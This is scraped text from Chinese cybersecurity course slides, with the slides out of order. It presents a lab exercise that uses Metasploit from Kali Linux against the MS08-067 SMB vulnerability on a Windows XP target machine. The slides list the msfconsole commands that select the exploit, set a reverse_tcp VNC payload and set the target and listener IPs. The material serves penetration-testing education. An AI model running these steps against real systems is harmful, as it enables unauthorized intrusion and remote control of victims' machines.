Metasploit攻击实验

14
14.3 Metasploit攻击实验
实验步骤： （8）对选项进行设置：
msf > set RHOST 192.168.52.129 （设置攻击目标IP） msf > set LHOST 192.168.52.133 （设置监听者IP）
网络空间安全技术实践教程
15
14.3 Metasploit攻击实验
实验步骤：
（9）使用 “exploit” 或 “run” 命令，对目标
发动漏洞攻击。
攻击成功
网络空间安全技术实践教程
16
14.3 Metasploit攻击实验
实验要求：
熟练掌握Metasploit漏洞利用的流程，在完成 上述步骤后，进一步熟悉Metasploit各个功能 模块的作用及使用
网络空间安全技术实践教程
Kali Linux 有MS08-067漏洞的Windows XP（靶机）
网络空间安全技术实践教程
ຫໍສະໝຸດ Baidu
7
14.3 Metasploit攻击实验
实验步骤： （1）根据扫描阶段搜集到的信息，选取漏洞 进行利用。以Windows XP系统的MS08-067 漏洞为例：
网络空间安全技术实践教程
8
14.3 Metasploit攻击实验
实验步骤： （2）终端输入 “msfconsole” 打开MSF的命 令行交互界面。
网络空间安全技术实践教程
9
14.3 Metasploit攻击实验
实验步骤： （3）搜索漏洞攻击程序：
msf > search ms08-067
网络空间安全技术实践教程
10
14.3 Metasploit攻击实验
实验步骤： （4）选择合适的漏洞攻击程序：
网络空间安全技术实践教程
4
14.3 Metasploit攻击实验
实验原理：
网络空间安全技术实践教程
5
14.3 Metasploit攻击实验
实验要点说明：（实验难点说明）
Metasploit渗透测试框架的使用
网络空间安全技术实践教程
6
14.3 Metasploit攻击实验
实验准备： （实验环境，实验先有知识技 术说明）
实验步骤： （6）选择攻击载荷：
msf > set payload windows/vncinject/reverse_tcp
网络空间安全技术实践教程
13
14.3 Metasploit攻击实验
实验步骤： （7）查看对目标进行漏洞攻击之前要设置的 选项：
msf > show options
网络空间安全技术实践教程
17
14.3 Metasploit攻击实验
实验扩展要求：
尝试熟练使用Metasploit的各个功能模块，完 成对Windows和Linux系统一些常见漏洞的利用 过程 学习自动化漏洞扫描和利用工具Armitage的使 用
网络空间安全技术实践教程
18
14.3 Metasploit攻击实验
实验视频：
msf > use exploit/windows/smb/ms08_067_netapi
网络空间安全技术实践教程
11
14.3 Metasploit攻击实验
实验步骤： （5）显示可用的攻击载荷：
msf > show payloads
网络空间安全技术实践教程
12
14.3 Metasploit攻击实验
网络空间安全技术实践教程
第四篇 渗透攻击测试实验篇
第十四章 漏洞利用实验 14.3 Metasploit攻击实验
网络空间安全技术实践教程
2
14.3 Metasploit攻击实验
实验目的： 熟练掌握Metasploit渗透测试框架的使
用，能使用Metasploit独立完成一次漏洞利用 过程。
网络空间安全技术实践教程
网络空间安全技术实践教程
19
3
14.3 Metasploit攻击实验
实验原理：
Metasploit是由Rapid 7公司开发的功能 强大的开源渗透测试框架。它提供了优秀的 模块化框架和底层基础库支持，灵活的插件 机制和命令行批处理文件机制，集成了Nmap， Nessus，OpenVAS，SET等优秀的渗透测试 工具。此外，还可以根据需求自行编写扩展 脚本进行个性化定制。